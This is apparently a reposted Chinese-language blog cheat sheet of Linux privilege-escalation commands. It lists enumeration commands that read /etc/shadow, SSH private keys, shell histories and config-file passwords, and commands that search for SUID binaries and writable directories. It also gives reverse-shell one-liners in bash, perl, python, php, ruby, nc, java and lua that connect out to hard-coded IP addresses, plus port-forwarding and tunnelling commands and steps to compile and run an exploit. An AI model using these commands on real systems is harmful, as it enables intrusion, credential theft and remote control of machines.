Linux 提权常用命令集

  • A+
所属分类:安全文章

0x00 操作系统相关

操作系统类型版本

    1. cat /etc/issue

     

      1. cat /etc/*-release

       

        1. cat /etc/lsb-release # Debian

         

          1. cat /etc/redhat-release # Redhat

           

          内核版本,是否是64位

            1. cat /proc/version

             

              1. uname -a

               

                1. uname -mrs

                 

                  1. rpm -q kernel

                   

                    1. dmesg | grep Linux

                     

                      1. ls /boot | grep vmlinuz-

                       

                      环境变量

                        1. cat /etc/profile

                         

                          1. cat /etc/bashrc

                           

                            1. cat ~/.bash_profile

                             

                              1. cat ~/.bashrc

                               

                                1. cat ~/.bash_logout

                                 

                                  1. env

                                   

                                    1. set

                                     

                                    查看是否有打印机

                                      1. lpstat -a

                                       

                                      0x01 应用与服务相关

                                      查看正在运行的程序及对应的用户权限

                                        1. ps aux

                                         

                                          1. ps -ef

                                           

                                            1. top

                                             

                                              1. cat /etc/services

                                               

                                              以root权限运行的进程

                                                1. ps aux | grep root

                                                 

                                                  1. ps -ef | grep root

                                                   

                                                  查看安装了的应用

                                                    1. ls -alh /usr/bin/

                                                     

                                                      1. ls -alh /sbin/

                                                       

                                                        1. dpkg -l

                                                         

                                                          1. rpm -qa

                                                           

                                                            1. ls -alh /var/cache/apt/archives

                                                             

                                                              1. ls -alh /var/cache/yum/

                                                               

                                                              一些服务的配置文件

                                                                1. cat /etc/syslog.conf

                                                                 

                                                                  1. cat /etc/chttp.conf

                                                                   

                                                                    1. cat /etc/lighttpd.conf

                                                                     

                                                                      1. cat /etc/cups/cupsd.conf

                                                                       

                                                                        1. cat /etc/inetd.conf

                                                                         

                                                                          1. cat /etc/apache2/apache2.conf

                                                                           

                                                                            1. cat /etc/my.conf

                                                                             

                                                                              1. cat /etc/httpd/conf/httpd.conf

                                                                               

                                                                                1. cat /opt/lampp/etc/httpd.conf

                                                                                 

                                                                                  1. ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

                                                                                   

                                                                                  计划任务

                                                                                    1. crontab -l

                                                                                     

                                                                                      1. ls -alh /var/spool/cron

                                                                                       

                                                                                        1. ls -al /etc/ | grep cron

                                                                                         

                                                                                          1. ls -al /etc/cron*

                                                                                           

                                                                                            1. cat /etc/cron*

                                                                                             

                                                                                              1. cat /etc/at.allow

                                                                                               

                                                                                                1. cat /etc/at.deny

                                                                                                 

                                                                                                  1. cat /etc/cron.allow

                                                                                                   

                                                                                                    1. cat /etc/cron.deny

                                                                                                     

                                                                                                      1. cat /etc/crontab

                                                                                                       

                                                                                                        1. cat /etc/anacrontab

                                                                                                         

                                                                                                          1. cat /var/spool/cron/crontabs/root

                                                                                                           

                                                                                                          找存储的明文用户名,密码

                                                                                                            1. grep -i user [filename]

                                                                                                             

                                                                                                              1. grep -i pass [filename]

                                                                                                               

                                                                                                                1. grep -C 5 "password" [filename]

                                                                                                                 

                                                                                                                  1. find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

                                                                                                                   

                                                                                                                  0x02 通信与网络相关

                                                                                                                  查看当前网络地址

                                                                                                                    1. /sbin/ifconfig -a

                                                                                                                     

                                                                                                                      1. cat /etc/network/interfaces

                                                                                                                       

                                                                                                                        1. cat /etc/sysconfig/network

                                                                                                                         

                                                                                                                        查看网络配置,DNS,DHCP,网关

                                                                                                                          1. cat /etc/resolv.conf

                                                                                                                           

                                                                                                                            1. cat /etc/sysconfig/network

                                                                                                                             

                                                                                                                              1. cat /etc/networks

                                                                                                                               

                                                                                                                                1. iptables -L

                                                                                                                                 

                                                                                                                                  1. hostname

                                                                                                                                   

                                                                                                                                    1. dnsdomainname

                                                                                                                                     

                                                                                                                                    查看网络通信

                                                                                                                                      1. lsof -i

                                                                                                                                       

                                                                                                                                        1. lsof -i :80

                                                                                                                                         

                                                                                                                                          1. grep 80 /etc/services

                                                                                                                                           

                                                                                                                                            1. netstat -antup

                                                                                                                                             

                                                                                                                                              1. netstat -antpx

                                                                                                                                               

                                                                                                                                                1. netstat -tulpn

                                                                                                                                                 

                                                                                                                                                  1. chkconfig --list

                                                                                                                                                   

                                                                                                                                                    1. chkconfig --list | grep 3:on

                                                                                                                                                     

                                                                                                                                                      1. last

                                                                                                                                                       

                                                                                                                                                        1. w

                                                                                                                                                         

                                                                                                                                                        查看缓存

                                                                                                                                                          1. arp -e

                                                                                                                                                           

                                                                                                                                                            1. route

                                                                                                                                                             

                                                                                                                                                              1. /sbin/route -nee

                                                                                                                                                               

                                                                                                                                                              tcpdump

                                                                                                                                                                1. tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

                                                                                                                                                                 

                                                                                                                                                                tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

                                                                                                                                                                交互式shell

                                                                                                                                                                bash版本:

                                                                                                                                                                  1. bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

                                                                                                                                                                   

                                                                                                                                                                  perl版本:

                                                                                                                                                                    1. perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

                                                                                                                                                                     

                                                                                                                                                                    python版本:

                                                                                                                                                                      1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

                                                                                                                                                                       

                                                                                                                                                                      php版本:

                                                                                                                                                                        1. php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

                                                                                                                                                                         

                                                                                                                                                                        ruby版本:

                                                                                                                                                                          1. ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

                                                                                                                                                                           

                                                                                                                                                                          nc版本:

                                                                                                                                                                            1. nc -e /bin/sh 223.8.200.234 1234

                                                                                                                                                                             

                                                                                                                                                                            nc不使用-e:

                                                                                                                                                                              1. mknod /tmp/backpipe p

                                                                                                                                                                               

                                                                                                                                                                                1. /bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe

                                                                                                                                                                                 

                                                                                                                                                                                mknod:

                                                                                                                                                                                  1. mknod backpipe p && telnet 173.214.173.151 8080 0backpipe

                                                                                                                                                                                   

                                                                                                                                                                                  java版本:

                                                                                                                                                                                    1. r = Runtime.getRuntime()

                                                                                                                                                                                     

                                                                                                                                                                                      1. p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/202.103.243.122/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])

                                                                                                                                                                                       

                                                                                                                                                                                        1. p.waitFor()

                                                                                                                                                                                         

                                                                                                                                                                                        lua版本:

                                                                                                                                                                                          1. lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

                                                                                                                                                                                          端口转发

                                                                                                                                                                                          lcx -<listen|tran|slave>

                                                                                                                                                                                          1. lcx -listen 4567 33891 #Attacker

                                                                                                                                                                                          2. lcx -slave 111.222.333.444 4567 127.0.0.1 3389 # On the targets

                                                                                                                                                                                          ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

                                                                                                                                                                                          1. ssh -L 8080:127.0.0.1:80 [email protected] # Local Port

                                                                                                                                                                                          2. ssh -R 8080:127.0.0.1:80 [email protected] # Remote Port

                                                                                                                                                                                          mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

                                                                                                                                                                                          1. mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe

                                                                                                                                                                                          2. mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)

                                                                                                                                                                                          3. mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

                                                                                                                                                                                          隧道

                                                                                                                                                                                          1. ssh -D 127.0.0.1:9050 -N [username]@[ip]

                                                                                                                                                                                          2. proxychains ifconfig

                                                                                                                                                                                          0x03 用户相关

                                                                                                                                                                                          用户信息

                                                                                                                                                                                          1. id

                                                                                                                                                                                          2. who

                                                                                                                                                                                          3. w

                                                                                                                                                                                          4. last

                                                                                                                                                                                          5. cat /etc/passwd

                                                                                                                                                                                          6. cat /etc/group

                                                                                                                                                                                          7. cat /etc/shadow

                                                                                                                                                                                          8. ls -alh /var/mail/

                                                                                                                                                                                          9. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # 列出超级用户

                                                                                                                                                                                          10. awk -F: '($3 == "0") {print}' /etc/passwd #列出超级用户

                                                                                                                                                                                          11. cat /etc/sudoers

                                                                                                                                                                                          12. sudo -l

                                                                                                                                                                                          列家目录

                                                                                                                                                                                          1. ls -ahlR /root/

                                                                                                                                                                                          2. ls -ahlR /home/

                                                                                                                                                                                          从配置文件里面寻找密码

                                                                                                                                                                                          1. cat /var/apache2/config.inc

                                                                                                                                                                                          2. cat /var/lib/mysql/mysql/user.MYD

                                                                                                                                                                                          3. cat /root/anaconda-ks.cfg

                                                                                                                                                                                          看其他用户的操作记录

                                                                                                                                                                                          1. cat ~/.bash_history

                                                                                                                                                                                          2. cat ~/.nano_history

                                                                                                                                                                                          3. cat ~/.atftp_history

                                                                                                                                                                                          4. cat ~/.mysql_history

                                                                                                                                                                                          5. cat ~/.php_history

                                                                                                                                                                                          ssh私钥

                                                                                                                                                                                          1. cat ~/.ssh/authorized_keys

                                                                                                                                                                                          2. cat ~/.ssh/identity.pub

                                                                                                                                                                                          3. cat ~/.ssh/identity

                                                                                                                                                                                          4. cat ~/.ssh/id_rsa.pub

                                                                                                                                                                                          5. cat ~/.ssh/id_rsa

                                                                                                                                                                                          6. cat ~/.ssh/id_dsa.pub

                                                                                                                                                                                          7. cat ~/.ssh/id_dsa

                                                                                                                                                                                          8. cat /etc/ssh/ssh_config

                                                                                                                                                                                          9. cat /etc/ssh/sshd_config

                                                                                                                                                                                          10. cat /etc/ssh/ssh_host_dsa_key.pub

                                                                                                                                                                                          11. cat /etc/ssh/ssh_host_dsa_key

                                                                                                                                                                                          12. cat /etc/ssh/ssh_host_rsa_key.pub

                                                                                                                                                                                          13. cat /etc/ssh/ssh_host_rsa_key

                                                                                                                                                                                          14. cat /etc/ssh/ssh_host_key.pub

                                                                                                                                                                                          15. cat /etc/ssh/ssh_host_key

                                                                                                                                                                                          0x04 文件系统相关

                                                                                                                                                                                          /etc/目录下面文件

                                                                                                                                                                                          1. ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone

                                                                                                                                                                                          2. ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner

                                                                                                                                                                                          3. ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group

                                                                                                                                                                                          4. ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other


                                                                                                                                                                                          5. find /etc/ -readable -type f 2>/dev/null # Anyone

                                                                                                                                                                                          6. find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

                                                                                                                                                                                          日志文件

                                                                                                                                                                                          1. ls -alh /var/log

                                                                                                                                                                                          2. ls -alh /var/mail

                                                                                                                                                                                          3. ls -alh /var/spool

                                                                                                                                                                                          4. ls -alh /var/spool/lpd

                                                                                                                                                                                          5. ls -alh /var/lib/pgsql

                                                                                                                                                                                          6. ls -alh /var/lib/mysql

                                                                                                                                                                                          7. cat /var/lib/dhcp3/dhclient.leases

                                                                                                                                                                                          查看网站文件

                                                                                                                                                                                          1. ls -alhR /var/www/

                                                                                                                                                                                          2. ls -alhR /srv/www/htdocs/

                                                                                                                                                                                          3. ls -alhR /usr/local/www/apache22/data/

                                                                                                                                                                                          4. ls -alhR /opt/lampp/htdocs/

                                                                                                                                                                                          5. ls -alhR /var/www/html/

                                                                                                                                                                                          常见日志文件

                                                                                                                                                                                          1. cat /etc/httpd/logs/access_log

                                                                                                                                                                                          2. cat /etc/httpd/logs/access.log

                                                                                                                                                                                          3. cat /etc/httpd/logs/error_log

                                                                                                                                                                                          4. cat /etc/httpd/logs/error.log

                                                                                                                                                                                          5. cat /var/log/apache2/access_log

                                                                                                                                                                                          6. cat /var/log/apache2/access.log

                                                                                                                                                                                          7. cat /var/log/apache2/error_log

                                                                                                                                                                                          8. cat /var/log/apache2/error.log

                                                                                                                                                                                          9. cat /var/log/apache/access_log

                                                                                                                                                                                          10. cat /var/log/apache/access.log

                                                                                                                                                                                          11. cat /var/log/auth.log

                                                                                                                                                                                          12. cat /var/log/chttp.log

                                                                                                                                                                                          13. cat /var/log/cups/error_log

                                                                                                                                                                                          14. cat /var/log/dpkg.log

                                                                                                                                                                                          15. cat /var/log/faillog

                                                                                                                                                                                          16. cat /var/log/httpd/access_log

                                                                                                                                                                                          17. cat /var/log/httpd/access.log

                                                                                                                                                                                          18. cat /var/log/httpd/error_log

                                                                                                                                                                                          19. cat /var/log/httpd/error.log

                                                                                                                                                                                          20. cat /var/log/lastlog

                                                                                                                                                                                          21. cat /var/log/lighttpd/access.log

                                                                                                                                                                                          22. cat /var/log/lighttpd/error.log

                                                                                                                                                                                          23. cat /var/log/lighttpd/lighttpd.access.log

                                                                                                                                                                                          24. cat /var/log/lighttpd/lighttpd.error.log

                                                                                                                                                                                          25. cat /var/log/messages

                                                                                                                                                                                          26. cat /var/log/secure

                                                                                                                                                                                          27. cat /var/log/syslog

                                                                                                                                                                                          28. cat /var/log/wtmp

                                                                                                                                                                                          29. cat /var/log/xferlog

                                                                                                                                                                                          30. cat /var/log/yum.log

                                                                                                                                                                                          31. cat /var/run/utmp

                                                                                                                                                                                          32. cat /var/webmin/miniserv.log

                                                                                                                                                                                          33. cat /var/www/logs/access_log

                                                                                                                                                                                          34. cat /var/www/logs/access.log

                                                                                                                                                                                          35. ls -alh /var/lib/dhcp3/

                                                                                                                                                                                          36. ls -alh /var/log/postgresql/

                                                                                                                                                                                          37. ls -alh /var/log/proftpd/

                                                                                                                                                                                          38. ls -alh /var/log/samba/

                                                                                                                                                                                          文件挂载

                                                                                                                                                                                          1. mount

                                                                                                                                                                                          2. df -h

                                                                                                                                                                                          3. cat /etc/fstab

                                                                                                                                                                                          Find命令

                                                                                                                                                                                          1. find / -perm -1000 -type d 2>/dev/null # 只有目录所有者才可以更改删除

                                                                                                                                                                                          2. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.

                                                                                                                                                                                          3. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.


                                                                                                                                                                                          4. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID

                                                                                                                                                                                          5. for i in `locate -r "bin$"`; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done # 从下面几个位置: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin 或者其他的bin目录寻找


                                                                                                                                                                                          6. find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null #从/,SGUD或者SUID开始查找,排除符号链接,深度为3个文件夹,显示详细的清单并去除错误信息

                                                                                                                                                                                          寻找可写目录

                                                                                                                                                                                          1. find / -writable -type d 2>/dev/null # 可写目录

                                                                                                                                                                                          2. find / -perm -222 -type d 2>/dev/null # 可写目录

                                                                                                                                                                                          3. find / -perm -o w -type d 2>/dev/null # 可写目录


                                                                                                                                                                                          4. find / -perm -o x -type d 2>/dev/null # 可执行目录


                                                                                                                                                                                          5. find / ( -perm -o w -perm -o x ) -type d 2>/dev/null # 可写可执行

                                                                                                                                                                                          6. 目录

                                                                                                                                                                                          查找文件

                                                                                                                                                                                          1. find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print 2>/dev/null # 可写文件

                                                                                                                                                                                          2. find / dir -xdev ( -nouser -o -nogroup ) -print 2>/dev/null # 无所有者文件

                                                                                                                                                                                          0x05 准备及攻击

                                                                                                                                                                                          查看语言支持

                                                                                                                                                                                          1. find / -name perl*

                                                                                                                                                                                          2. find / -name python*

                                                                                                                                                                                          3. find / -name gcc*

                                                                                                                                                                                          4. find / -name cc

                                                                                                                                                                                          查看上传方式

                                                                                                                                                                                          1. find / -name wget

                                                                                                                                                                                          2. find / -name nc*

                                                                                                                                                                                          3. find / -name netcat*

                                                                                                                                                                                          4. find / -name tftp*

                                                                                                                                                                                          5. find / -name ftp

                                                                                                                                                                                          编译exp

                                                                                                                                                                                          1. which gcc

                                                                                                                                                                                          2. gcc exp.c -o exp

                                                                                                                                                                                          运行

                                                                                                                                                                                          1. chmod +x exp

                                                                                                                                                                                          2. ./exp


                                                                                                                                                                                          本文始发于微信公众号(飓风网络安全):Linux 提权常用命令集

                                                                                                                                                                                          发表评论

                                                                                                                                                                                          :?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: